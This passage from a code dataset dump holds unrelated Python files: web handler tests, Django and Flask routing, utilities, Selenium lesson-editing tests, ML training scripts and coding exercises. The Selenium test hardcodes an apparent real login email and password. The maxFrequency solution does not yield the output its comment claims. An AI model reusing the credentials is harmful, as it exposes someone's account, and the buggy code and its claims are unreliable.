mock_get_timestamp.return_value = \"2012-03-15T06:51:08Z\"\n expected_ack_response = FileUtilities.get_file_string(str(self.message_dir / EXPECTED_RESPONSE_FILE))\n request_body = FileUtilities.get_file_string(str(self.message_dir / REQUEST_FILE))\n mock_callback = Mock()\n self.callbacks[REF_TO_MESSAGE_ID] = mock_callback\n\n ack_response = self.fetch(\"/\", method=\"POST\", body=request_body, headers=CONTENT_TYPE_HEADERS)\n\n self.assertEqual(ack_response.code, 200)\n self.assertEqual(ack_response.headers[\"Content-Type\"], \"text/xml\")\n XmlUtilities.assert_xml_equal(expected_ack_response, ack_response.body)\n mock_callback.assert_called_with(EXPECTED_MESSAGE)\n\n def test_post_no_callback(self):\n # If there is no callback registered for the message ID the response is in reference to, an HTTP 500 should be\n # returned.\n request_body = FileUtilities.get_file_string(str(self.message_dir / REQUEST_FILE))\n\n response = self.fetch(\"/\", method=\"POST\", body=request_body, headers=CONTENT_TYPE_HEADERS)\n\n self.assertEqual(response.code, 500)\n","sub_path":"mhs-reference-implementation/mhs/handler/tests/test_async_response_handler.py","file_name":"test_async_response_handler.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"260565146","text":"\"\"\"snippet_manager URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
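The AsyncHTTPTestCase shape used above, reduced to a minimal self-contained test; handler and route are invented:
from tornado.testing import AsyncHTTPTestCase
from tornado.web import Application, RequestHandler

class PingHandler(RequestHandler):
    def get(self):
        self.write("pong")

class PingTest(AsyncHTTPTestCase):
    def get_app(self):
        # the framework starts this app on a free port for each test
        return Application([(r"/ping", PingHandler)])

    def test_ping(self):
        response = self.fetch("/ping")   # synchronous wrapper around the async HTTP client
        self.assertEqual(response.code, 200)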
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.urls import include, path\nfrom core import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('registration.backends.simple.urls')),\n path(\"\", views.index, name=\"index\"),\n path('core/add/', views.add_snippet, name='add_snippet'),\n path('core/details//', views.snippet_details, name='snippet_details',),\n path('core/edit//', views.edit_snippet, name='edit_snippet'),\n path('core/delet//', views.delete_snippet, name='delete_snippet'),\n path('core/search/', views.search_results, name='search_results'),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n path('__debug__/', include(debug_toolbar.urls)),\n\n # For django versions before 2.0:\n # url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","sub_path":"snippet_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"294074576","text":"import contextlib\nfrom typing import Mapping\nfrom timeit import default_timer as time\nimport warnings\n\n\nclass Timer:\n \"\"\"Class to accumulate timings for named operations.\"\"\"\n\n def __init__(self):\n self._clock_starts = {}\n self._accumulated_time = {}\n self._hit_count = {}\n self._enabled = True\n\n def start(self, name: str):\n \"\"\"Start timing a given named operation.\"\"\"\n if self._enabled:\n if name in self._clock_starts:\n raise ValueError(f\"clock already started for '{name}'\")\n else:\n self._clock_starts[name] = time()\n\n def stop(self, name: str):\n \"\"\"Stop timing a given named operation, add the time elapsed to\n accumulated timing and increase the hit count.\n \"\"\"\n if self._enabled:\n if name not in self._accumulated_time:\n self._accumulated_time[name] = time() - self._clock_starts.pop(name)\n else:\n self._accumulated_time[name] += time() - self._clock_starts.pop(name)\n if name not in self._hit_count:\n self._hit_count[name] = 1\n else:\n self._hit_count[name] += 1\n\n @contextlib.contextmanager\n def clock(self, name: str):\n \"\"\"Context manager to produce timings of operations.\n\n Args:\n name: the name of the operation being timed\n\n Example:\n The context manager times operations that happen within its context. The\n following would time a time.sleep operation::\n\n >>> import time\n >>> from fv3gfs.util import Timer\n >>> timer = Timer()\n >>> with timer.clock(\"sleep\"):\n ... 
time.sleep(1)\n ...\n >>> timer.times\n {'sleep': 1.0032463260000029}\n \"\"\"\n self.start(name)\n yield\n self.stop(name)\n\n @property\n def times(self) -> Mapping[str, float]:\n \"\"\"accumulated timings for each operation name\"\"\"\n if len(self._clock_starts) > 0:\n warnings.warn(\n \"Retrieved times while clocks are still going, \"\n \"incomplete times are not included: \"\n f\"{list(self._clock_starts.keys())}\",\n RuntimeWarning,\n )\n return self._accumulated_time.copy()\n\n @property\n def hits(self) -> Mapping[str, int]:\n \"\"\"accumulated hit counts for each operation name\"\"\"\n if len(self._clock_starts) > 0:\n warnings.warn(\n \"Retrieved hit counts while clocks are still going, \"\n \"incomplete times are not included: \"\n f\"{list(self._clock_starts.keys())}\",\n RuntimeWarning,\n )\n return self._hit_count.copy()\n\n def reset(self):\n \"\"\"Remove all accumulated timings.\"\"\"\n self._accumulated_time.clear()\n self._hit_count.clear()\n\n def enable(self):\n \"\"\"Enable the Timer.\"\"\"\n self._enabled = True\n\n def disable(self):\n \"\"\"Disable the Timer.\"\"\"\n if len(self._clock_starts) > 0:\n raise RuntimeError(\n \"Cannot disable timer while clocks are still going: \"\n f\"{list(self._clock_starts.keys())}\"\n )\n self._enabled = False\n\n @property\n def enabled(self) -> bool:\n \"\"\"Indicates whether the timer is currently enabled.\"\"\"\n return self._enabled\n\n\nclass NullTimer(Timer):\n \"\"\"A Timer class which does not actually accumulate timings.\n\n Meant to be used in place of an optional timer.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self._enabled = False\n\n def enable(self):\n \"\"\"Enable the Timer.\"\"\"\n raise NotImplementedError(\n \"NullTimer cannot be enabled, maybe create a Timer and \"\n \"disable it instead of using NullTimer\"\n )\n\n @property\n def enabled(self) -> bool:\n \"\"\"Indicates whether the timer is currently enabled.\"\"\"\n return False\n","sub_path":"fv3gfs/util/_timing.py","file_name":"_timing.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"374649749","text":"# Copyright (c) 2017 Red Hat.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
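Exercising the Timer semantics documented above; the measured value is approximate:
import time

timer = Timer()
with timer.clock("sleep"):     # start/stop bracketed by the context manager
    time.sleep(0.1)
print(timer.times)             # {'sleep': ~0.1}
print(timer.hits)              # {'sleep': 1}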
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport uuid\n\nfrom os_vif import objects as osv_objects\nfrom os_vif.objects import vif as osv_vif\nfrom oslo_serialization import jsonutils\n\n\ndef _fake_vif(cls=osv_vif.VIFOpenVSwitch):\n vif = cls(\n id=uuid.uuid4(),\n vif_name='h_interface',\n bridge_name='bridge',\n address='3e:94:b7:31:a0:83',\n port_profile=osv_objects.vif.VIFPortProfileOpenVSwitch(\n interface_id='89eccd45-43e9-43d8-b4cc-4c13db13f782',\n profile_id=str(uuid.uuid4()),\n ),\n )\n vif.network = osv_objects.network.Network(id=uuid.uuid4(), mtu=1)\n subnet = osv_objects.subnet.Subnet(\n uuid=uuid.uuid4(),\n dns=['192.168.0.1'],\n cidr='192.168.0.0/24',\n gateway='192.168.0.1',\n routes=osv_objects.route.RouteList(objects=[]),\n )\n subnet.ips = osv_objects.fixed_ip.FixedIPList(objects=[])\n subnet.ips.objects.append(\n osv_objects.fixed_ip.FixedIP(address='192.168.0.2'))\n vif.network.subnets.objects.append(subnet)\n vif.active = True\n return vif\n\n\ndef _fake_vif_dict(obj=None):\n if obj:\n return obj.obj_to_primitive()\n else:\n return _fake_vif().obj_to_primitive()\n\n\ndef _fake_vif_string(dictionary=None):\n if dictionary:\n return jsonutils.dumps(dictionary)\n else:\n return jsonutils.dumps(_fake_vif_dict())\n\n\ndef _fake_vifs(cls=osv_vif.VIFOpenVSwitch, prefix='eth'):\n return {'eth0': _fake_vif(cls), prefix+'1': _fake_vif(cls)}\n\n\ndef _fake_vifs_dict(obj=None):\n if obj:\n return {\n ifname: vif.obj_to_primitive() for\n ifname, vif in obj.items()\n }\n else:\n return {\n ifname: vif.obj_to_primitive() for\n ifname, vif in _fake_vifs().items()\n }\n\n\ndef _fake_vifs_string(dictionary=None):\n if dictionary:\n return jsonutils.dumps(dictionary)\n else:\n return jsonutils.dumps(_fake_vifs_dict())\n","sub_path":"kuryr_kubernetes/tests/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96120601","text":"import time\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\n\n\nurl = \"https://stepic.org/lesson/%D0%9A%D0%B0%D0%BA-%D0%B8%D0%B3%D1%80%D0%B0%D1%82%D1%8C-%D0%B8%D0%BD%D1%82%D1%80%D0%BE-%D0%B8%D0%B7-Stairway-to-Heaven-%D0%BD%D0%B0-%D1%83%D0%BA%D1%83%D0%BB%D0%B5%D0%BB%D0%B5-31049/step/3\"\nusername = \"liakhulia@gmail.com\"\npassword = \"512345\"\npath_to_chromedriver = \"C://chromedriver\"\ntest_text = \"Answer below\"\n\nclass LessonEdit(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(path_to_chromedriver)\n #self.driver = webdriver.Firefox()\n def open_lesson_to_edit(self):\n driver = self.driver\n driver.get(url)\n driver.implicitly_wait(10)\n\n elem = driver.find_element_by_xpath('//*[@class = \"introjs-button introjs-skipbutton\"]')\n elem.click()\n\n alert = driver.switch_to.alert\n alert.accept()\n print(\"alert accepted\")\n\n time.sleep(2)\n login = driver.find_element_by_xpath('//*[@class = \"navbar\"]/div[2]/a[1]')\n login.click()\n\n login_field = driver.find_element_by_id('id_login')\n login_field.send_keys(username)\n password_field = driver.find_element_by_id('id_password')\n password_field.send_keys(password)\n password_field.send_keys(Keys.RETURN)\n\n\n edit = 
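How the fixture helpers above compose, using only functions defined in this module:
vifs = _fake_vifs(prefix='tap')    # 'eth0' stays hard-coded; prefix only renames the second port
assert set(vifs) == {'eth0', 'tap1'}
payload = _fake_vifs_string(_fake_vifs_dict(vifs))   # JSON string of os_vif primitives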
driver.find_element_by_xpath('//*[@class = \"lesson-header__buttons\"]/a[1]')\n edit.click()\n\n def restore_correst_option(self):\n driver = self.driver\n\n driver.execute_script(\"window.scrollTo(0, 0)\") # hardcoded\n edit = driver.find_element_by_xpath('//*[@class = \"lesson-header__buttons\"]/a[1]')\n edit.click()\n\n\n checkbox1 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[5]')\n checkbox2 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[3]')\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n\n checkbox1.click()\n checkbox2.click()\n save.click()\n\n def restore_textfield(self):\n driver = self.driver\n driver.execute_script(\"window.scrollTo(0, 0)\") # hardcoded\n edit = driver.find_element_by_xpath('//*[@class = \"lesson-header__buttons\"]/a[1]')\n edit.click()\n\n textfield = driver.find_element_by_xpath('//*[@class=\"wysihtml5-textarea step-text-wrapper wysi-textarea__body theory\"]')\n for i in range (len(test_text)):\n textfield.send_keys(Keys.BACK_SPACE)\n\n\n def test_correct_answer(self):\n self.open_lesson_to_edit()\n print (\"Testing correct option\")\n driver = self.driver\n\n checkbox1 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[5]')\n checkbox2 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[3]')\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n\n checkbox1.click()\n checkbox2.click()\n save.click()\n\n start = driver.find_element_by_xpath('(//*[@class = \"attempt__actions\"])/button[1]')\n\n start.click()\n time.sleep(1)\n driver.execute_script(\"window.scrollTo(0, 315)\") # hardcoded\n\n option = driver.find_element_by_xpath('(//*[@class = \"s-radio__border\"])[1]')\n\n option.click()\n submit = driver.find_element_by_xpath('//*[@class = \"submit-submission\"]')\n\n submit.click()\n try:\n correct = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@class = \"attempt-wrapper__result-icon ember-view svg-icon correct_icon\"]'))\n )\n except:\n self.fail(\"Incorrect answer\")\n\n self.restore_correst_option()\n\n def test_edit_text(self):\n self.open_lesson_to_edit()\n print(\"Testing text editing\")\n\n driver = self.driver\n\n textfield = driver.find_element_by_xpath('//*[@class=\"wysihtml5-textarea step-text-wrapper wysi-textarea__body theory\"]')\n\n textfield.send_keys(\"Answer below\")\n\n assert \"below\" in textfield.text\n\n elem = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n elem.click()\n\n textfield = driver.find_element_by_xpath('//*[@class=\"ember-view step-text-wrapper\"]')\n assert \"below\" in textfield.text\n\n self.restore_textfield()\n\n def test_too_many_options(self):\n self.open_lesson_to_edit()\n print (\"Testing quiz options. 
Too many options warning.\")\n driver = self.driver\n checkbox = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[3]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n\n\n checkbox.click()\n\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n save.click()\n\n try:\n warning = driver.find_element_by_xpath('//*[@class = \"s-hint s-hint_warning\"]')\n\n except:\n self.fail (\"Warning is not displayed\")\n\n\n try:\n error = driver.find_element_by_xpath('//*[@class = \"error\"]')\n except:\n self.fail(\"Error is not displayed\")\n\n\n def test_no_options(self):\n self.open_lesson_to_edit()\n print(\"Testing quiz options. No options selected.\")\n\n driver = self.driver\n checkbox = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[5]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n checkbox.click()\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n save.click()\n\n try:\n warning = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//*[@class = \"s-hint s-hint_warning\"]'))\n )\n\n except:\n self.fail (\"Warning is not displayed\")\n\n\n try:\n error = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//*[@class = \"error\"]'))\n )\n\n except:\n self.fail(\"Error is not displayed\")\n\n\n try:\n WebDriverWait(driver, 10).until(\n EC.alert_is_present()\n )\n alert = driver.switch_to.alert\n alert.accept()\n except:\n print(\"No alert is present\")\n\n\n\n def tearDown(self):\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326037798","text":"import os\nimport sys\nif sys.version_info > (3, 0):\n import pickle\nelse:\n import cPickle as pickle\nimport autograd.numpy as np\nimport pandas as pd\nimport argparse\n\nfrom Emulator.Emulator import EmulatorMaster, RBF\nfrom Preprocessor.PipeLine import PipeLine, Normalize, PCA\nfrom DataReader.DataLoader import DataLoader\n\ndef Training(args):\n data = DataLoader(args['Prior'], args['ModelData'], args['ExpData'])\n \n \"\"\"\n we need to normalized the observed points for better emulation\n We need to normalize both the output and input space\n for output space, PCA is also performed for dimension reduction\n \"\"\"\n output_pipe = PipeLine([('Normalize', Normalize()), ('PCA', PCA(args['principalcomp'], args['fraction'])), ('Normalized', Normalize())])\n input_pipe = Normalize()\n\n emulator = EmulatorMaster(data.sim_para, data.sim_data, input_pipe, output_pipe)\n \n if len(args['initialscale']) == 1:\n initial_scale = np.full(len(data.par_name), args['initialscale'][0])\n elif len(args['initialscale']) != len(data.par_name):\n print('Initial scale must have the same dimension as number of parameters. 
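The explicit-wait idiom the tests above repeat, shown in isolation; the locator is a placeholder:
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By

button = WebDriverWait(driver, 10).until(       # poll up to 10s instead of sleeping blindly
    EC.element_to_be_clickable((By.XPATH, '//button[@type="submit"]'))
)
button.click()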
Abort!')\n sys.exit()\n else:\n initial_scale = np.array(args['initialscale'])\n \n if args['covariancefunc'] == 'RBF':\n emulator.SetCovariance(RBF)\n initial_scale = args['initialscale']\n\n scales, nuggets = emulator.Train(initial_scale, \n args['initialnugget'], \n max_step=args['maxsteps'], \n scales_rate=args['scalerate'], \n nuggets_rate=args['nuggetrate'])\n \n \"\"\"\n Write all the training result, together with training points and pipe used to a file\n \"\"\"\n output_name = os.path.join('training', '%s.pkl' % args['Training_name'])\n if args['abs']:\n output_name = args['Training_name']\n with open(output_name, 'wb') as buff:\n pickle.dump({'emulator': emulator, 'data': data,\n 'scales': scales, 'nuggets': nuggets}, buff)\n\n\nif __name__=='__main__':\n\n parser = argparse.ArgumentParser(description='This script will choose an optimal set of hyperparameters by minizing loss function')\n parser.add_argument('Prior', help='Locatioin of parameter priors')\n parser.add_argument('ModelData', help='Location of the model simulation files')\n parser.add_argument('ExpData', help='Location of the experimental result')\n parser.add_argument('Training_name', help='Output filename of the optimized emulator. It will be stored under folder \"training/\"')\n parser.add_argument('-cf', '--covariancefunc', default='ARD', help='Your choice of different covariance function (Default: ARD)')\n parser.add_argument('-pc', '--principalcomp', default=3, type=int, help='Number of principal components used (Default: 3)')\n parser.add_argument('-is', '--initialscale', default=[0.5], type=float, nargs='+', help='Initial Scale. If array is needed, please enter more than 1 number in this argument')\n parser.add_argument('-in', '--initialnugget', default=1, type=float, help='Initial Scale. Input must be an array of the same size as number of parameters.')\n parser.add_argument('-sr', '--scalerate', default=0.003, type=float, help='Rate at which scale will advance in 1 step (Default: 0.003)')\n parser.add_argument('-nr', '--nuggetrate', default=0.003, type=float, help='Rate at which nugget will advance in 1 step (Default: 0.003)')\n parser.add_argument('-ms', '--maxsteps', default=1000, type=int, help='Maximum training steps allowed (Default: 1000)')\n parser.add_argument('-fr', '--fraction', default=None, type=float, help='Fraction of PCA variance used. 
Once set it will override pc (Default: None)')\n    parser.add_argument('-a', '--abs', action='store_true', help='If selected, the output training name will be in absolute path')\n    args = vars(parser.parse_args())\n    \n    Training(args)\n    \n","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"496002924","text":"from django.conf.urls.defaults import *\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nadmin.autodiscover()\n\nhandler500 = 'djangotoolbox.errorviews.server_error'\n\nurlpatterns = patterns('',\n    ('^_ah/warmup$', 'djangoappengine.views.warmup'),\n    (r'^admin/', include(admin.site.urls)),\n    ('', include('cms.urls')),\n)\n\nurlpatterns += staticfiles_urlpatterns()\n","sub_path":"writesite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"371280536","text":"# name : slip \n# date : 2019/7/7 11:09 \n# e-mail : slip1233@126.com\n\n# Processes\nimport multiprocessing\ndata_list = []\ndef task(arg):\n    data_list.append(arg)\n    print(data_list)\n\ndef run():\n    for i in range(10):\n        m = multiprocessing.Process(target=task, args=(i,))\n        m.start()\n\nif __name__ == '__main__':\n    run()\n    print(data_list) # []","sub_path":"进程线程/day34/1.进程的使用.py","file_name":"1.进程的使用.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"584163266","text":"#!/usr/bin/python3\nfrom models import storage\nfrom flask import Flask, render_template\n\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n@app.route('/states')\n@app.route('/states_list')\ndef states_list():\n    lis = storage.all(\"State\").values()\n    return render_template('7-states_list.html', lis=lis)\n\n\n@app.route('/cities_by_states')\ndef cities_states():\n    st = storage.all('State').values()\n    return render_template('8-cities_by_states.html', st=st)\n\n\n@app.route('/states/')\ndef cit_b_st(id):\n    lis = storage.all('State')\n    if \"State.\" + id in lis:\n        state = lis[\"State.\" + id]\n    else:\n        state = None\n    return render_template('9-states.html', state=state)\n\n\n@app.teardown_appcontext\ndef shutdown_(self):\n    storage.close()\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port='5000')\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"201290064","text":"\"\"\"\nProblem 1's wording is fairly involved, but once decoded it is basic simulation.\nGiven a String, find the maxima frequency of the whole string.\nThe maxima frequency: at each index, every letter with the highest freq occurrence in substring(0, i) gets one point; the result is the largest maxima frequency over the whole string.\nWorked example:\ntake abbcca\nidx = 0,\n'a' has the highest frequency, maxima freq of a = 1,\nidx = 1\n'a' and 'b' have the highest frequency, maxima freq of a = 2, b = 1\nidx = 2\n'b' has the highest frequency, maxima freq of b = 2\nidx = 3\n'b' has the highest frequency, maxima freq of b = 3\nidx = 4\n'b' and 'c' have the highest frequency, maxima freq of b = 4, maxima freq of c = 1\nidx = 5\n'a', 'b' and 'c' all have the highest frequency, maxima freq of a = 3, maxima freq of b = 5, maxima freq of c = 2\nThe final map is {a: 3, b: 5, c: 2}\nso the final return value is 5\n\"\"\"\nfrom collections import defaultdict, deque\n\n\ndef maxFrequency(nums):\n    maxNum = []\n    res = {}\n    count = defaultdict(int)\n    for item in nums:\n        count[item] += 1\n        while maxNum and maxNum[-1][0] < 
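The process demo above prints [] at the end because every child mutates its own copy of data_list. One conventional fix, not part of the original snippet, is a manager-backed list:
import multiprocessing

def task(shared, arg):
    shared.append(arg)            # proxies the append back to the manager process

if __name__ == '__main__':
    with multiprocessing.Manager() as mgr:
        shared = mgr.list()
        procs = [multiprocessing.Process(target=task, args=(shared, i)) for i in range(10)]
        for p in procs:
            p.start()
        for p in procs:
            p.join()
        print(list(shared))       # all ten values; arrival order is not guaranteed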
count[item]:\n maxNum.pop()\n if not maxNum or maxNum[-1][0] == count[item]:\n maxNum.append((count[item], item))\n for n, c in maxNum:\n if c not in res:\n res[c] = 1\n else:\n res[c] += 1\n return res\n\n\nnums = \"abbcca\"\nprint(maxFrequency(nums))\n# {a: 3, b: 5, c: 2}\n","sub_path":"Amazon/maxFrequency.py","file_name":"maxFrequency.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329428656","text":"import time\nfrom binary_search_tree import BinarySearchTree\n\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nstart_time = time.time()\nduplicates = []\n\n# Time Compelexity for this is O(n*m).\n\n# for name_1 in names_1:\n# for name_2 in names_2:\n# if name_1 == name_2:\n# duplicates.append(name_1)\n\n# ATTEMPT 1\n# Let's use a binary search tree\n# This will have Time Complexity of O(log(n)) for insertion and O(log(n)) for look up\n# So in total this is O(log(n) + log(n)) => O(log(n))\nbst = BinarySearchTree(names_1[0])\n\n# Slice the first element off since it's already included in the BinarySearchTree\nfor name_1 in names_1[1:]:\n bst.insert(name_1)\n\nfor name_2 in names_2:\n if bst.contains(name_2):\n duplicates.append(name_2)\n\n\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n# ---------- Stretch Goal -----------\n# Python has built-in tools that allow for a very efficient approach to this problem\n# What's the best time you can accomplish with no restrictions on techniques or data\n# structures?\n\nstart_time = time.time()\n\nduplicates_stretch = []\n\n# STRETCH ATTEMPT 1\n\n# Runtime for this is 0.0076 at max\n# Time Complexity is O(max(n, m))\n\nnames_dict_stretch = {}\nfor x in range(0, len(names_1)):\n names_dict_stretch[names_1[x]] = x\n\nfor name_2 in names_2:\n if name_2 in names_dict_stretch:\n duplicates_stretch.append(name_2)\n\n\nend_time = time.time()\nprint (f\"{len(duplicates_stretch)} duplicates:\\n\\n{', '.join(duplicates_stretch)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n\n# ------- STRETCH ATTEMPT 2 ---------\n\n\nstart_time = time.time()\n\n# STRETCH ATTEMPT 2\nduplicates_stretch_2 = list(set(names_1) & set(names_2))\n\n\nend_time = time.time()\nprint (f\"{len(duplicates_stretch_2)} duplicates:\\n\\n{', '.join(duplicates_stretch_2)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4188067","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.metrics import confusion_matrix, roc_auc_score\nimport matplotlib.pyplot as plt\nimport ast\n\n## Both of these random seeds are set to improve the reproducibility of results\nfrom numpy.random import seed\nseed(1)\n\nfrom tensorflow import set_random_seed\nset_random_seed(2)\n\noutcomes_train_df = pd.read_csv('../preprocessing/outcomes_data_train.csv')\noutcomes_test_df = pd.read_csv('../preprocessing/outcomes_data_test.csv')\n\n# Different attributes could be selected for training to determine 
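For "abbcca" the stack version above actually prints {'b': 1, 'c': 1, 'a': 1} rather than the {a: 3, b: 5, c: 2} its comment expects, because letters popped from maxNum lose their accumulated credit. A direct reading of the docstring's rules, offered as a corrected sketch:
from collections import defaultdict

def max_frequency_direct(s):
    count = defaultdict(int)
    score = defaultdict(int)
    best = 0
    for ch in s:
        count[ch] += 1
        best = max(best, count[ch])
        for c, n in count.items():
            if n == best:         # every letter tied at the running maximum scores a point
                score[c] += 1
    return dict(score)

print(max_frequency_direct("abbcca"))   # {'a': 3, 'b': 5, 'c': 2}; the answer is max(...) == 5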
which features provided the best classification results\nX_train = outcomes_train_df[['DGN', 'PRE6', 'PRE14', 'PRE7', 'PRE8', 'PRE9', 'PRE10', 'PRE11', 'PRE17', 'PRE19',\n 'PRE25', 'PRE30', 'PRE32', 'PRE4']].values\ny_train = outcomes_train_df[['Risk1Yr']].values\n\nX_test = outcomes_test_df[['DGN', 'PRE6', 'PRE14', 'PRE7', 'PRE8', 'PRE9', 'PRE10', 'PRE11', 'PRE17', 'PRE19',\n 'PRE25', 'PRE30', 'PRE32', 'PRE4']].values\ny_test = outcomes_test_df[['Risk1Yr']].values\n\n# This function converted the data from the CSV to a numpy array which is used for training the neural network model\ndef convert_to_numpy(dataframe):\n new_dataframe = []\n for row in dataframe.tolist():\n for value in range(len(row)):\n print(isinstance(row[value], str))\n if isinstance(row[value], str):\n row[value] = ast.literal_eval(row[value])\n new_row = []\n for element in row:\n if isinstance(element,list):\n for value in element:\n new_row.append(value)\n continue\n new_row.append(element)\n new_dataframe.append(new_row)\n return np.asarray(new_dataframe)\n\nX_train = convert_to_numpy(X_train)\nX_test = convert_to_numpy(X_test)\n\n# This is our first model which was a deep neural network that used rectified linear activation units\n# Dropout was used as regularization of our network and each layer had 64 nodes\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=25, activation='relu'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(1, activation='relu'))\n\n# This functions compiles the above model with its associated loss function and optimizer\n# We used mean squared error as the loss function with the Adam optimizer\nmodel.compile(loss='mean_squared_error',\n optimizer='adam',\n metrics=['accuracy'])\n\n# This trains the model using 500 epochs and a batch size of 50\nmodel.fit(X_train, y_train,\n epochs=500,\n batch_size=50, verbose=1)\n\n# This was used to return the model's predictions (probabilities) on the test set\n# As well as convert the probabilities to the class labels\ny_pred_1 = model.predict(X_test)\ny_pred_bool = (y_pred_1 >= 0.5)\n\n# This evaluates the trained model on the test set\nscore, acc = model.evaluate(X_test, y_test, batch_size=100)\nprint('Test accuracy: ', acc)\n\ncm = confusion_matrix(y_test, y_pred_bool)\nprint(cm)\nprint(roc_auc_score(y_test, y_pred_1))\n\n# This is our second model which was a shallow neural network that used hyperbolic tangent activation functions\n# Dropout was used as regularization of our network and each layer had 64 nodes\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=25, activation='tanh'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='tanh'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(1, 